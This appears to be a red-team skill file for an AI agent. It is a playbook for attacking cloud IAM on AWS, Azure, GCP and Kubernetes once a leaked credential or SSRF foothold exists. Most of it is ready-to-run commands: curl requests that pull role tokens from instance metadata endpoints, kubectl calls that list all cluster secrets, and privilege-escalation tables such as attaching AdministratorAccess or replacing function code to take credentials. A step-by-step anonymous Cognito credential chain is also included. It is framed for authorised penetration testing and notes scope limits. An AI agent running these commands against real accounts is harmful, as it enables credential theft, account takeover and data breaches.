| name | cloud-iam-deep |
| description | Cloud IAM red-team attack chain across AWS, Azure, GCP — focused on EXTERNAL exploitation paths and post-credential-discovery privilege analysis. Covers IAM enumeration (aws iam, az role, gcloud iam), STS/AssumeRole chaining, Azure Managed Identity abuse (via SSRF/leak), GCP service account JSON abuse, IMDSv1/v2 attacks via SSRF, K8s ServiceAccount token privilege analysis once held (token discovery / cluster exposure is owned by hunt-k8s), role-trust-policy confused-deputy, cross-account assume-role enumeration, IAM privilege escalation patterns (24+ AWS, 8+ Azure, 6+ GCP), and AWS Cognito Identity Pool unauthenticated-role attack chain (GetId → GetCredentialsForIdentity → IAM role abuse). Built for the case where recon yields a credential (key, JSON, token) and you need to know what it grants and how to escalate. Use when an AWS key / Azure secret / GCP service account JSON / K8s SA token surfaces from a code repo, JS bundle, APK, breach corpus, or SSRF chain. |
| sources | aws-iam-docs, azure-rbac-docs, gcp-iam-docs, hackingthe.cloud, pacu, peirates, prowler, rhinosecuritylabs_research, hackerone_public |
| report_count | 6 |
When to use
Trigger when:
- A cloud credential surfaces (key, secret, token, JSON file)
- SSRF chain reaches IMDS / metadata endpoint
- APK / git-leak reveals embedded cloud key
- Recon shows public S3/GCS/Azure-blob with permissions you can verify
- A Kubernetes API or service-account token is exposed
- Post-RCE on a cloud-hosted instance — pivot to cloud control plane
Do NOT use for:
- On-prem-only environments (use AD attack skills — but those are out of scope per external-only boundary)
- Web2 vulns that happen to be on AWS — use the relevant
hunt-* skill
Credential identification (first 60 seconds)
AKIA[0-9A-Z]{16}
ASIA[0-9A-Z]{16}
AGPA[0-9A-Z]{16}
AIDA[0-9A-Z]{16}
AROA[0-9A-Z]{16}
ANPA[0-9A-Z]{16}
[A-Za-z0-9/+=]{40}
AccountKey=[A-Za-z0-9+/=]{86}
client_secret pattern + UUID
{
"type": "service_account",
"project_id": "...",
"private_key_id": "...",
"private_key": "-----BEGIN PRIVATE KEY-----..."
}
eyJhbGciOiJSUzI1...
AWS — read-only validation (the safe first step)
export AWS_ACCESS_KEY_ID="AKIA..."
export AWS_SECRET_ACCESS_KEY="..."
aws sts get-caller-identity
aws iam list-users 2>&1 | head -5
aws iam list-roles 2>&1 | head -5
aws iam list-policies 2>&1 | head -5
aws iam list-groups 2>&1 | head -5
aws iam list-attached-user-policies --user-name <self>
aws iam list-user-policies --user-name <self>
aws iam list-groups-for-user --user-name <self>
aws ec2 describe-instances --max-items 1 2>&1 | head
aws s3 ls 2>&1 | head -10
aws lambda list-functions --max-items 5 2>&1 | head
aws rds describe-db-instances --max-items 5 2>&1 | head
aws secretsmanager list-secrets --max-results 5 2>&1 | head
aws ssm describe-parameters --max-results 5 2>&1 | head
aws iam list-roles --query 'Roles[?contains(AssumeRolePolicyDocument.Statement[0].Principal.AWS, `arn:aws:iam::`)]' 2>&1 | head -20
AWS privesc patterns (24+ documented — iam_privesc techniques)
Quick lookup — if you have any of these IAM actions, escalate via the listed technique:
| You have | Escalate via |
|---|
iam:CreateAccessKey | Create access key on any user → impersonate |
iam:CreateLoginProfile | Set a console password on a user → login |
iam:UpdateLoginProfile | Reset console password on a user |
iam:AttachUserPolicy | Attach AdministratorAccess to self |
iam:AttachGroupPolicy | Attach AdministratorAccess to a group you're in |
iam:AttachRolePolicy + sts:AssumeRole | Attach to a role you can assume |
iam:PutUserPolicy | Inline AdministratorAccess to self |
iam:PutGroupPolicy | Inline policy on a group |
iam:PutRolePolicy | Inline on a role you can assume |
iam:AddUserToGroup | Add self to admin group |
iam:UpdateAssumeRolePolicy + sts:AssumeRole | Modify trust to allow self |
iam:CreatePolicyVersion | Create v2 of an attached policy with admin |
iam:SetDefaultPolicyVersion | Switch attached policy to admin version |
iam:PassRole + ec2:RunInstances | Launch EC2 as admin role → use instance creds |
iam:PassRole + lambda:CreateFunction/InvokeFunction | Run code as admin role |
iam:PassRole + cloudformation:CreateStack | CF stack creates resources as admin |
iam:PassRole + glue:CreateDevEndpoint | Notebook runs as admin role |
iam:PassRole + datapipeline | Pipeline runs as admin role |
iam:PassRole + codestar:CreateProject | New project gets admin role |
ec2:RunInstances (with admin instance profile already on the AMI) | Spin instance, exfil creds from IMDS |
lambda:UpdateFunctionCode (function has admin role) | Replace code → exfil creds |
lambda:UpdateFunctionConfiguration | Add layer / env var that exfils |
cloudformation:UpdateStack | Modify stack to grant self admin |
sts:AssumeRole (where trust allows you) | Direct privilege jump |
Many of the destructive ones are out-of-scope for an external red-team; document the path, don't always execute.
AWS — STS / cross-account / role chaining
aws iam list-roles --query 'Roles[].[RoleName,AssumeRolePolicyDocument]' --output json > /tmp/roles.json
aws sts assume-role --role-arn "arn:aws:iam::OTHER_ACCT:role/CrossAccountRole" --role-session-name "rt-1"
export AWS_ACCESS_KEY_ID="ASIA..."
export AWS_SECRET_ACCESS_KEY="..."
export AWS_SESSION_TOKEN="..."
aws sts get-caller-identity
Confused-deputy pattern: look for sts:ExternalId missing or trust policies that allow arn:aws:iam::*:role/*. If ExternalId is not required, anyone can assume the role.
AWS IMDSv1 / IMDSv2 abuse via SSRF
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
TOKEN=...
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
Azure — credential validation
az login --service-principal -u <appId> -p <password> --tenant <tenantId>
az login --identity
az account show
az account list --output table
az role assignment list --assignee <objectId> --all
az role assignment list --all --query '[?principalId==`<objectId>`]' --output table
az resource list --output table | head -30
az storage account list --output table
az keyvault list --output table
az vm list --output table
Azure — Managed Identity abuse
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
TOKEN="..."
curl -H "Authorization: Bearer $TOKEN" "https://management.azure.com/subscriptions?api-version=2020-01-01"
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net"
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com"
Azure privesc patterns
| You have | Escalate via |
|---|
Microsoft.Authorization/roleAssignments/write on tenant | Self-assign Owner |
Microsoft.Authorization/roleDefinitions/write | Modify role def to add powers |
Microsoft.Compute/virtualMachines/runCommand/action | Run command on VM (with VM's MI) |
Microsoft.KeyVault/vaults/secrets/getSecret/action | Read all KV secrets |
Microsoft.Storage/storageAccounts/listkeys/action | Read all storage blobs |
Microsoft.Web/sites/publishxml/action | Get publish profile → RCE on app |
Microsoft.Web/sites/host/listkeys/action | Func app key → RCE via function trigger |
Microsoft.AAD.Directory.* (App reg) + RoleManagement.ReadWrite.Directory | Grant self Global Admin |
GCP — service account JSON
gcloud auth activate-service-account --key-file=sa-leaked.json
gcloud auth list
gcloud config get-value account
gcloud config get-value project
gcloud projects get-iam-policy <projectId> \
--flatten="bindings[].members" \
--format="table(bindings.role)" \
--filter="bindings.members:<sa-email>"
gcloud compute instances list 2>&1 | head
gcloud storage buckets list 2>&1 | head
gcloud secrets list 2>&1 | head
gcloud functions list 2>&1 | head
gcloud sql instances list 2>&1 | head
gcloud container clusters list 2>&1 | head
GCP privesc patterns
| You have | Escalate via |
|---|
iam.serviceAccounts.getAccessToken on higher-priv SA | Get token for that SA |
iam.serviceAccounts.implicitDelegation | Chain through delegate SAs |
iam.serviceAccounts.signBlob / signJwt on higher SA | Forge JWT for that SA |
iam.serviceAccountKeys.create | Create new key for any SA → impersonate |
iam.serviceAccounts.setIamPolicy | Grant self impersonation rights |
iam.roles.update (on custom role) | Add admin permissions to a role you have |
cloudfunctions.functions.update (function runs as high-priv SA) | Replace code → exfil creds |
cloudfunctions.functions.call + above | Trigger replacement |
compute.instances.setMetadata | Add ssh-keys metadata → SSH as root |
compute.instances.setServiceAccount | Attach higher-priv SA to instance |
cloudbuild.builds.create (build runs as project SA) | Build executes attacker code |
deploymentmanager.deployments.create | Resources created as DM SA |
GCP IMDS attack (via SSRF or post-RCE)
curl -H "Metadata-Flavor: Google" \
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
TOKEN=...
curl -H "Authorization: Bearer $TOKEN" \
"https://cloudresourcemanager.googleapis.com/v1/projects"
Kubernetes — exposed API / SA token
curl -sk "https://k8s.target.com:6443/api/v1/namespaces"
curl -sk "https://k8s.target.com:6443/api/v1/pods?limit=1"
export TOKEN="eyJ..."
kubectl --token=$TOKEN --server=https://k8s.target.com:6443 --insecure-skip-tls-verify get namespaces
kubectl --token=$TOKEN --server=https://k8s.target.com:6443 --insecure-skip-tls-verify auth can-i --list
kubectl --token=$TOKEN --server=https://k8s.target.com:6443 --insecure-skip-tls-verify get pods -A
kubectl --token=$TOKEN --server=https://k8s.target.com:6443 --insecure-skip-tls-verify get secrets -A
K8s privesc patterns
| You have | Escalate via |
|---|
pods/exec on high-priv pod | exec into pod with admin SA token |
pods/create + serviceaccounts/use | Create pod mounting admin SA token |
secrets/get | Read any service-account token in cluster |
clusterrolebindings/create | Grant self cluster-admin |
roles/escalate or clusterroles/escalate | Add permissions to role |
nodes/proxy | Proxy to kubelet on any node → exec via kubelet |
bind verb on roles | Bind a role you don't have to a subject |
impersonate on users/groups/SAs | Operate as another principal |
Tooling reference
| Tool | Cloud | Purpose |
|---|
| Pacu | AWS | Full red-team framework, 100+ modules |
| enumerate-iam.py | AWS | Brute-force list of API calls to discover permissions |
| PMapper | AWS | Visualize privesc paths as graph |
| CloudFox | AWS | Recon-focused (enumerate resources, no privesc) |
| Prowler | AWS/Azure/GCP | Compliance scanning + enumeration |
| ScoutSuite | AWS/Azure/GCP/OCI | Multi-cloud audit |
| AzureHound | Azure | BloodHound-style graph for Azure |
| MicroBurst | Azure | Azure-specific recon and abuse modules |
| ROADtools | Azure | Entra ID enumeration toolkit |
| GCPBucketBrute | GCP | GCS bucket permission enumeration |
| gcpwn | GCP | GCP-specific exploitation framework |
| Peirates | K8s | Container/cluster exploitation toolkit |
| kube-hunter | K8s | Auto-scan cluster from inside/outside |
| kubectl-trace | K8s | Trace processes (post-foothold) |
Anti-patterns
- DO NOT run write/delete operations without explicit OK — IAM mutation is destructive and audit-visible
- DO NOT enumerate everything in scope of an account —
aws iam list-users against an account with 50,000 users is loud and slow
- DO NOT use
aws * with non-test creds without confirming you have the right account — accidentally hitting prod = career risk
- DO NOT confuse "I have the credential" with "this credential is current" — always check expiration / rotation via STS first
- DO NOT assume an STS token from one account works across accounts — region restrictions and trust policies apply
- DO NOT skip CloudTrail/Activity Log awareness — every API call is logged; pair with
mid-engagement-ir-detection
- DO NOT pivot deeper than the SOW allows — discovering admin creds doesn't mean using them; some engagements are read-only
Bridge to neighboring skills
hunt-cloud-misconfig — finds the credentials in the first place (public buckets, IMDS via SSRF, leaked JSON)hunt-ssrf — SSRF→IMDS is the canonical chain into cloud control planeapk-redteam-pipeline — APK secret extraction commonly yields cloud credssupply-chain-attack-recon — CI/CD pipelines store cloud creds; finding them is a separate workflowm365-entra-attack — Azure cross-product; Managed Identity tokens cross over to Graphmid-engagement-ir-detection — cloud control plane activity is monitored; expect mitigations
Severity scoring guidance
| Finding | Severity |
|---|
AWS access key with *:* in policy → confirmed admin | Critical |
GCP SA JSON with roles/owner on production project | Critical |
| Azure MI on internet-exposed VM with Owner role | Critical |
| Leaked cred with read-only on prod data store | High (or Critical depending on data sensitivity) |
| Leaked cred with privesc path but no admin yet | High |
| Leaked cred — read access only to non-sensitive | Medium |
| Anonymous public bucket — listing only | Low/Medium |
| Anonymous bucket — write permission | High |
Cleanup discipline (deliverable hygiene)
If during the engagement you:
- Used
sts:AssumeRole to chain — note the role names and times in IoCs
- Created any IAM resources (test users, roles, policies) — list them with explicit cleanup confirmation
- Read sensitive data (Secrets Manager, KMS keys, Storage blob content) — note in deliverable that data was viewed but not exfiltrated outside the engagement systems
Cloud activity is trivially auditable; the client WILL find it post-engagement. Documenting now > getting blindsided later.
AWS Cognito Identity Pool — Unauthenticated-Role Attack Chain (2024-2026 surface)
AWS Cognito has two distinct services often confused: User Pools (auth provider) and Identity Pools (federated identity → IAM credentials). Identity Pools can be configured with "Enable access to unauthenticated identities" — which gives ANY anonymous caller an IAM role via cognito-identity:GetId → cognito-identity:GetCredentialsForIdentity. Mobile apps and SPAs ship the IdentityPoolId in the page bundle. Developers commonly attach overly-broad IAM permissions to the unauth role, especially when the pool was set up for AWS Amplify / Pinpoint / CloudWatch RUM and the role policy was never narrowed.
Step 1 — Discover the IdentityPoolId
The IdentityPoolId is a public identifier by AWS design (<region>:<UUID> format). The find:
grep -ErohE "identityPoolId[\"'`\s:=]+[\"']([a-z]{2}-[a-z]+-[0-9]:[0-9a-f-]{36})[\"']" .
grep -ErohE "IdentityPoolId[\"'`\s:=]+[\"']([a-z]{2}-[a-z]+-[0-9]:[0-9a-f-]{36})[\"']" .
grep -ErohE "\"PoolId\"\s*:\s*\"([a-z]{2}-[a-z]+-[0-9]:[0-9a-f-]{36})\"" .
grep -rEi "identity[_-]?pool[_-]?id" decoded/
grep -rE "\"[a-z]{2}-[a-z]+-[0-9]:[0-9a-f-]{36}\"" decoded/
amplifyconfiguration.json
awsconfiguration.json
aws-exports.js
.env.js
*.js.map
Wayback CDX captures, GitHub code-search for the apex domain + IdentityPoolId, and JS chunks linked from index.html are the high-yield search corpora.
Step 2 — GetId (unauth)
aws cognito-identity get-id \
--identity-pool-id us-east-1:abcd1234-5678-90ab-cdef-1234567890ab \
--region us-east-1 \
--no-sign-request
--no-sign-request is critical — tells the CLI not to look for ambient AWS credentials. Returns {"IdentityId": "us-east-1:<uuid>"}. If this returns NotAuthorizedException, unauth identities are disabled — stop, not exploitable.
Step 3 — GetCredentialsForIdentity
aws cognito-identity get-credentials-for-identity \
--identity-id us-east-1:<returned-uuid> \
--region us-east-1 \
--no-sign-request
Returns real STS credentials with ~1 hour TTL: AccessKeyId (ASIA…), SecretKey, SessionToken, Expiration.
Step 4 — Confirm role ARN
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
aws sts get-caller-identity
Returns role ARN like arn:aws:sts::<account>:assumed-role/Cognito_<PoolName>Unauth_Role/CognitoIdentityCredentials. Account ID is now disclosed.
Step 5 — Enumerate role permissions
Direct (rare):
aws iam get-role --role-name Cognito_<PoolName>Unauth_Role
aws iam list-role-policies --role-name Cognito_<PoolName>Unauth_Role
aws iam list-attached-role-policies --role-name Cognito_<PoolName>Unauth_Role
Blackbox (the normal case) — fire a permission probe across high-value services and observe AccessDenied vs success. Pacu's iam__enum_permissions --role-name <name> brute-forces ~500 IAM actions; enumerate-iam.py by Andrés Riancho covers ~1000. Common over-permissions: s3:Get*/s3:List*, dynamodb:Scan, lambda:InvokeFunction, appsync:GraphQL, cognito-idp:AdminCreateUser, iam:PassRole, kms:Decrypt.
Severity rubric
| Finding | Severity | Justification |
|---|
Unauth role with *:* or AdministratorAccess | Critical (9.8+) | Full AWS account takeover |
Unauth role with s3:Get* / s3:List* on production customer buckets, or dynamodb:Scan on user tables | Critical (9.1-9.8) | Mass PII / data breach |
Unauth role with appsync:GraphQL on production API, or lambda:InvokeFunction on internal lambdas | Critical (9.0) | Authenticated backend access |
Unauth role with cognito-idp:Admin* on the linked User Pool | Critical (9.1) | Mass ATO primitive |
Unauth role with iam:PassRole + create-function | Critical (9.8) | Documented priv-esc to admin |
Unauth role with s3:PutObject on web-hosting bucket | High (8.1) | Stored XSS / supply-chain |
Unauth role with kms:Decrypt on a customer CMK | High (7.5-8.5) | Depends on ciphertext reachability |
| Unauth role with read-only on a single hardcoded non-sensitive resource | Medium (5.3) | Limited business impact |
| Unauth identities enabled but role policy denies everything | Informational | Best-practice deviation only |
Disclosed cases / authoritative writeups
- Andres Riancho — "Misconfigured Cognito Identity Pools" (2020, refreshed 2023) — original research establishing the attack class.
GetCredentialsForIdentity against unauth pools with default * policies. andresriancho.com
- Rhino Security Labs — Pacu
cognito__enum_identity_pools module — production tooling that automates Steps 1-5 of the chain. github.com/RhinoSecurityLabs/pacu
- NotSoSecure / Claranet — "Exploiting weak configurations in Amazon Cognito" (Nov 2023) — walkthrough of identityPoolId extraction → assume guest role → S3/DynamoDB/Lambda enumeration. Calls out RUM, Amplify, Pinpoint as the three SDKs that commonly expose the pool ID in HTML. notsosecure.com
- HackTricks Cloud —
aws-cognito-unauthenticated-enum — canonical playbook covering Steps 1-5. cloud.hacktricks.wiki
- Spaceraccoon / Eugene Lim — "Mass Account Takeover via Cognito IdentityPool" (Medium, 2020) — SaaS provider exposed IdentityPoolId in Amplify config; unauth role had
cognito-idp:AdminConfirmSignUp + AdminUpdateUserAttributes on the linked User Pool — silent confirmation of any signup + email change = mass ATO.
- Datadog Security Labs — "Following AWS Logs Backwards: Cognito Identity Pool Abuse" (2024) — telemetry across Datadog customer base showing real-world Cognito pool abuse. Non-trivial percentage of pools paired with policies broader than the minimum required. securitylabs.datadoghq.com
Reporting tip
Always include in the report:
sts get-caller-identity output (proves the role ARN + account ID)- Pacu
iam__enum_permissions JSON output (proves the granted actions)
- A concrete data-pull PoC (one sample S3 object listing, one DynamoDB record with PII redacted)
Without all three, triagers downgrade to Medium. The 60-second test is GetId → GetCredentialsForIdentity → sts get-caller-identity. If you reach step 3 anonymously, you have a finding.
Cross-reference: hunt-cloud-misconfig → CloudWatch RUM weaponization covers the specific RUM-embedded variant of this attack class.
Related Skills & Chains
hunt-ssrf — Most external paths to a cloud credential begin with SSRF reaching the metadata service. Chain primitive: SSRF + IMDSv1 → instance role token → cloud-iam-deep privilege-escalation patterns reach prod S3 / Secrets Manager.hunt-cloud-misconfig — Public buckets and exposed configs are the most common credential-leak vector. Chain primitive: Cloud misconfig (.env in public S3) + leaked AWS access key → IAM enumeration → iam:PassRole chain to admin.supply-chain-attack-recon — CI/CD often holds long-lived deploy credentials. Chain primitive: Exposed GitHub Actions OIDC misconfig + assume-role permission → cloud-iam-deep cross-account role assumption.m365-entra-attack — Azure Managed Identity overlaps Entra service principals. Chain primitive: SSRF on Azure App Service → Managed Identity token → m365-entra-attack Graph API enumeration → cross-tenant escalation.security-arsenal — Load the Cloud IAM Privilege-Escalation Payload Pack (24+ AWS, 8+ Azure, 6+ GCP escalation patterns with aws cli one-liners).triage-validation — Apply the Server-State-vs-Policy gate: a permissive IAM policy alone is not a finding; demonstrate actual privileged action (e.g., read prod secret, create cross-account role) before reporting.
